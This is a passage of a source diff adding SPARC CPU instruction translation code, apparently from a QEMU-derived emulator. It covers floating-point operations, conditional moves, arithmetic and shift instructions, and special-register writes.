+ cpu_src1_32 = gen_load_fpr_F(dc, rs2); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x5: /* fnegs */ + gen_ne_fop_FF(dc, rd, rs2, gen_helper_fnegs); + break; + case 0x9: /* fabss */ + gen_ne_fop_FF(dc, rd, rs2, gen_helper_fabss); + break; + case 0x29: /* fsqrts */ + CHECK_FPU_FEATURE(dc, FSQRT); + gen_fop_FF(dc, rd, rs2, gen_helper_fsqrts); + break; + case 0x2a: /* fsqrtd */ + CHECK_FPU_FEATURE(dc, FSQRT); + gen_fop_DD(dc, rd, rs2, gen_helper_fsqrtd); + break; + case 0x2b: /* fsqrtq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQ(dc, rd, rs2, gen_helper_fsqrtq); + break; + case 0x41: /* fadds */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fadds); + break; + case 0x42: /* faddd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_faddd); + break; + case 0x43: /* faddq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_faddq); + break; + case 0x45: /* fsubs */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fsubs); + break; + case 0x46: /* fsubd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fsubd); + break; + case 0x47: /* fsubq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fsubq); + break; + case 0x49: /* fmuls */ + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fmuls); + break; + case 0x4a: /* fmuld */ + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld); + break; + case 0x4b: /* fmulq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fmulq); + break; + case 0x4d: /* fdivs */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fdivs); + break; + case 0x4e: /* fdivd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fdivd); + break; + case 0x4f: /* fdivq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fdivq); + break; + case 0x69: /* fsmuld */ + CHECK_FPU_FEATURE(dc, FSMULD); + gen_fop_DFF(dc, rd, rs1, rs2, gen_helper_fsmuld); + break; + case 0x6e: /* fdmulq */ + 
CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QDD(dc, rd, rs1, rs2, gen_helper_fdmulq); + break; + case 0xc4: /* fitos */ + gen_fop_FF(dc, rd, rs2, gen_helper_fitos); + break; + case 0xc6: /* fdtos */ + gen_fop_FD(dc, rd, rs2, gen_helper_fdtos); + break; + case 0xc7: /* fqtos */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_FQ(dc, rd, rs2, gen_helper_fqtos); + break; + case 0xc8: /* fitod */ + gen_ne_fop_DF(dc, rd, rs2, gen_helper_fitod); + break; + case 0xc9: /* fstod */ + gen_ne_fop_DF(dc, rd, rs2, gen_helper_fstod); + break; + case 0xcb: /* fqtod */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_DQ(dc, rd, rs2, gen_helper_fqtod); + break; + case 0xcc: /* fitoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QF(dc, rd, rs2, gen_helper_fitoq); + break; + case 0xcd: /* fstoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QF(dc, rd, rs2, gen_helper_fstoq); + break; + case 0xce: /* fdtoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QD(dc, rd, rs2, gen_helper_fdtoq); + break; + case 0xd1: /* fstoi */ + gen_fop_FF(dc, rd, rs2, gen_helper_fstoi); + break; + case 0xd2: /* fdtoi */ + gen_fop_FD(dc, rd, rs2, gen_helper_fdtoi); + break; + case 0xd3: /* fqtoi */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_FQ(dc, rd, rs2, gen_helper_fqtoi); + break; +#ifdef TARGET_SPARC64 + case 0x2: /* V9 fmovd */ + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x3: /* V9 fmovq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_move_Q(dc, rd, rs2); + break; + case 0x6: /* V9 fnegd */ + gen_ne_fop_DD(dc, rd, rs2, gen_helper_fnegd); + break; + case 0x7: /* V9 fnegq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fnegq); + break; + case 0xa: /* V9 fabsd */ + gen_ne_fop_DD(dc, rd, rs2, gen_helper_fabsd); + break; + case 0xb: /* V9 fabsq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fabsq); + break; + case 0x81: /* V9 fstox */ + gen_fop_DF(dc, rd, rs2, gen_helper_fstox); + break; + case 
0x82: /* V9 fdtox */ + gen_fop_DD(dc, rd, rs2, gen_helper_fdtox); + break; + case 0x83: /* V9 fqtox */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_DQ(dc, rd, rs2, gen_helper_fqtox); + break; + case 0x84: /* V9 fxtos */ + gen_fop_FD(dc, rd, rs2, gen_helper_fxtos); + break; + case 0x88: /* V9 fxtod */ + gen_fop_DD(dc, rd, rs2, gen_helper_fxtod); + break; + case 0x8c: /* V9 fxtoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QD(dc, rd, rs2, gen_helper_fxtoq); + break; +#endif + default: + goto illegal_insn; + } + } else if (xop == 0x35) { /* FPU Operations */ +#ifdef TARGET_SPARC64 + int cond; +#endif + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_op_clear_ieee_excp_and_FTT(dc); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + xop = GET_FIELD(insn, 18, 26); + save_state(dc); + +#ifdef TARGET_SPARC64 +#define FMOVR(sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 10, 12); \ + cpu_src1 = get_src1(dc, insn); \ + gen_compare_reg(dc, &cmp, cond, cpu_src1); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + if ((xop & 0x11f) == 0x005) { /* V9 fmovsr */ + FMOVR(s); + break; + } else if ((xop & 0x11f) == 0x006) { // V9 fmovdr + FMOVR(d); + break; + } else if ((xop & 0x11f) == 0x007) { // V9 fmovqr + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVR(q); + break; + } +#undef FMOVR +#endif + switch (xop) { +#ifdef TARGET_SPARC64 +#define FMOVCC(fcc, sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 14, 17); \ + gen_fcompare(dc, &cmp, fcc, cond); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + case 0x001: /* V9 fmovscc %fcc0 */ + FMOVCC(0, s); + break; + case 0x002: /* V9 fmovdcc %fcc0 */ + FMOVCC(0, d); + break; + case 0x003: /* V9 fmovqcc %fcc0 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(0, q); + break; + case 0x041: /* V9 fmovscc %fcc1 */ + FMOVCC(1, s); + break; + case 0x042: /* V9 fmovdcc %fcc1 */ + FMOVCC(1, d); + break; + case 0x043: 
/* V9 fmovqcc %fcc1 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(1, q); + break; + case 0x081: /* V9 fmovscc %fcc2 */ + FMOVCC(2, s); + break; + case 0x082: /* V9 fmovdcc %fcc2 */ + FMOVCC(2, d); + break; + case 0x083: /* V9 fmovqcc %fcc2 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(2, q); + break; + case 0x0c1: /* V9 fmovscc %fcc3 */ + FMOVCC(3, s); + break; + case 0x0c2: /* V9 fmovdcc %fcc3 */ + FMOVCC(3, d); + break; + case 0x0c3: /* V9 fmovqcc %fcc3 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(3, q); + break; +#undef FMOVCC +#define FMOVCC(xcc, sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 14, 17); \ + gen_compare(dc, &cmp, xcc, cond); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + case 0x101: /* V9 fmovscc %icc */ + FMOVCC(0, s); + break; + case 0x102: /* V9 fmovdcc %icc */ + FMOVCC(0, d); + break; + case 0x103: /* V9 fmovqcc %icc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(0, q); + break; + case 0x181: /* V9 fmovscc %xcc */ + FMOVCC(1, s); + break; + case 0x182: /* V9 fmovdcc %xcc */ + FMOVCC(1, d); + break; + case 0x183: /* V9 fmovqcc %xcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(1, q); + break; +#undef FMOVCC +#endif + case 0x51: /* fcmps, V9 %fcc */ + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + cpu_src2_32 = gen_load_fpr_F(dc, rs2); + gen_op_fcmps(dc, rd & 3, cpu_src1_32, cpu_src2_32); + break; + case 0x52: /* fcmpd, V9 %fcc */ + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_op_fcmpd(dc, rd & 3, cpu_src1_64, cpu_src2_64); + break; + case 0x53: /* fcmpq, V9 %fcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + gen_op_fcmpq(dc, rd & 3); + break; + case 0x55: /* fcmpes, V9 %fcc */ + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + cpu_src2_32 = gen_load_fpr_F(dc, rs2); + gen_op_fcmpes(dc, rd & 3, cpu_src1_32, cpu_src2_32); + break; + case 0x56: /* fcmped, V9 %fcc */ + cpu_src1_64 = 
gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_op_fcmped(dc, rd & 3, cpu_src1_64, cpu_src2_64); + break; + case 0x57: /* fcmpeq, V9 %fcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + gen_op_fcmpeq(dc, rd & 3); + break; + default: + goto illegal_insn; + } + } else if (xop == 0x2) { + TCGv dst = gen_dest_gpr(dc, rd); + rs1 = GET_FIELD(insn, 13, 17); + if (rs1 == 0) { + /* clr/mov shortcut : or %g0, x, y -> mov x, y */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_movi_tl(tcg_ctx, dst, simm); + gen_store_gpr(dc, rd, dst); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 == 0) { + tcg_gen_movi_tl(tcg_ctx, dst, 0); + gen_store_gpr(dc, rd, dst); + } else { + cpu_src2 = gen_load_gpr(dc, rs2); + gen_store_gpr(dc, rd, cpu_src2); + } + } + } else { + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_ori_tl(tcg_ctx, dst, cpu_src1, simm); + gen_store_gpr(dc, rd, dst); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 == 0) { + /* mov shortcut: or x, %g0, y -> mov x, y */ + gen_store_gpr(dc, rd, cpu_src1); + } else { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_or_tl(tcg_ctx, dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, dst); + } + } + } +#ifdef TARGET_SPARC64 + } else if (xop == 0x25) { /* sll, V9 sllx */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + } + 
tcg_gen_shl_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + } else if (xop == 0x26) { /* srl, V9 srlx */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); + tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); + tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); + } + } + gen_store_gpr(dc, rd, cpu_dst); + } else if (xop == 0x27) { /* sra, V9 srax */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); + tcg_gen_sari_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_ext32s_i64(tcg_ctx, cpu_dst, cpu_src1); + tcg_gen_sar_i64(tcg_ctx, cpu_dst, cpu_dst, cpu_tmp0); + } + } + gen_store_gpr(dc, rd, cpu_dst); +#endif + } else if (xop < 0x36) { + if (xop < 0x20) { + cpu_src1 = get_src1(dc, insn); + cpu_src2 = get_src2(dc, insn); + switch (xop & ~0x10) { + case 0x0: /* add */ + if (xop & 0x10) { + gen_op_add_cc(dc, 
cpu_dst, cpu_src1, cpu_src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); + dc->cc_op = CC_OP_ADD; + } else { + tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + } + break; + case 0x1: /* and */ + tcg_gen_and_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x2: /* or */ + tcg_gen_or_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x3: /* xor */ + tcg_gen_xor_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x4: /* sub */ + if (xop & 0x10) { + gen_op_sub_cc(dc, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); + dc->cc_op = CC_OP_SUB; + } else { + tcg_gen_sub_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + } + break; + case 0x5: /* andn */ + tcg_gen_andc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x6: /* orn */ + tcg_gen_orc_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x7: /* xorn */ + tcg_gen_eqv_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, 
CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0x8: /* addx, V9 addc */ + gen_op_addx_int(dc, cpu_dst, cpu_src1, cpu_src2, + (xop & 0x10)); + break; +#ifdef TARGET_SPARC64 + case 0x9: /* V9 mulx */ + tcg_gen_mul_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + break; +#endif + case 0xa: /* umul */ + CHECK_IU_FEATURE(dc, MUL); + gen_op_umul(dc, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0xb: /* smul */ + CHECK_IU_FEATURE(dc, MUL); + gen_op_smul(dc, cpu_dst, cpu_src1, cpu_src2); + if (xop & 0x10) { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_cc_dst, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_LOGIC); + dc->cc_op = CC_OP_LOGIC; + } + break; + case 0xc: /* subx, V9 subc */ + gen_op_subx_int(dc, cpu_dst, cpu_src1, cpu_src2, + (xop & 0x10)); + break; +#ifdef TARGET_SPARC64 + case 0xd: /* V9 udivx */ + gen_helper_udivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); + break; +#endif + case 0xe: /* udiv */ + CHECK_IU_FEATURE(dc, DIV); + if (xop & 0x10) { + gen_helper_udiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + dc->cc_op = CC_OP_DIV; + } else { + gen_helper_udiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + } + break; + case 0xf: /* sdiv */ + CHECK_IU_FEATURE(dc, DIV); + if (xop & 0x10) { + gen_helper_sdiv_cc(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + dc->cc_op = CC_OP_DIV; + } else { + gen_helper_sdiv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, + cpu_src2); + } + break; + default: + goto illegal_insn; + } + gen_store_gpr(dc, rd, cpu_dst); + } else { + cpu_src1 = get_src1(dc, insn); + cpu_src2 = get_src2(dc, insn); + switch (xop) { + case 0x20: /* taddcc */ + gen_op_add_cc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, 
CC_OP_TADD); + dc->cc_op = CC_OP_TADD; + break; + case 0x21: /* tsubcc */ + gen_op_sub_cc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_TSUB); + dc->cc_op = CC_OP_TSUB; + break; + case 0x22: /* taddcctv */ + gen_helper_taddcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, + cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + dc->cc_op = CC_OP_TADDTV; + break; + case 0x23: /* tsubcctv */ + gen_helper_tsubcctv(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, + cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + dc->cc_op = CC_OP_TSUBTV; + break; + case 0x24: /* mulscc */ + update_psr(dc); + gen_op_mulscc(dc, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADD); + dc->cc_op = CC_OP_ADD; + break; +#ifndef TARGET_SPARC64 + case 0x25: /* sll */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_shli_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_shl_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x26: /* srl */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_shri_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_shr_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x27: /* sra */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + tcg_gen_sari_tl(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } else { /* register */ + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + tcg_gen_sar_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + break; +#endif + case 0x30: + { + cpu_tmp0 = 
get_temp_tl(dc); + switch(rd) { + case 0: /* wry */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_y, cpu_tmp0, 0xffffffff); + break; +#ifndef TARGET_SPARC64 + /* undefined in the SPARCv8 manual, nop on the microSPARC II */ + case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: + + /* implementation-dependent in the SPARCv8 manual, nop on the microSPARC II */ + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + if ((rd == 0x13) && (dc->def->features & + CPU_FEATURE_POWERDOWN)) { + /* LEON3 power-down */ + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + } + break; +#else + case 0x2: /* V9 wrccr */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_wrccr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); + dc->cc_op = CC_OP_FLAGS; + break; + case 0x3: /* V9 wrasi */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_tmp0, 0xff); + tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_asi, cpu_tmp0); + break; + case 0x6: /* V9 wrfprs */ + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + tcg_gen_trunc_tl_i32(tcg_ctx, tcg_ctx->cpu_fprs, cpu_tmp0); + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + break; + case 0xf: /* V9 sir, nop if user */ +#if !defined(CONFIG_USER_ONLY) + if (supervisor(dc)) { + ; // XXX + } +#endif + break; + case 0x13: /* Graphics Status */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1, cpu_src2); + break; + case 0x14: /* Softint set */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, 
cpu_src1, cpu_src2); + gen_helper_set_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x15: /* Softint clear */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_clear_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x16: /* Softint write */ + if (!supervisor(dc)) + goto illegal_insn; + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_write_softint(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 0x17: /* Tick compare */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tick_cmpr, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_tick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 0x18: /* System tick */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_set_count(tcg_ctx, r_tickptr, + cpu_tmp0); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 0x19: /* System tick compare */ +#if !defined(CONFIG_USER_ONLY) + if (!supervisor(dc)) + goto illegal_insn; +#endif + { + TCGv_ptr r_tickptr; + + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_stick_cmpr, cpu_src1, + cpu_src2); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_stick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + + case 0x10: /* Performance Control */ + 
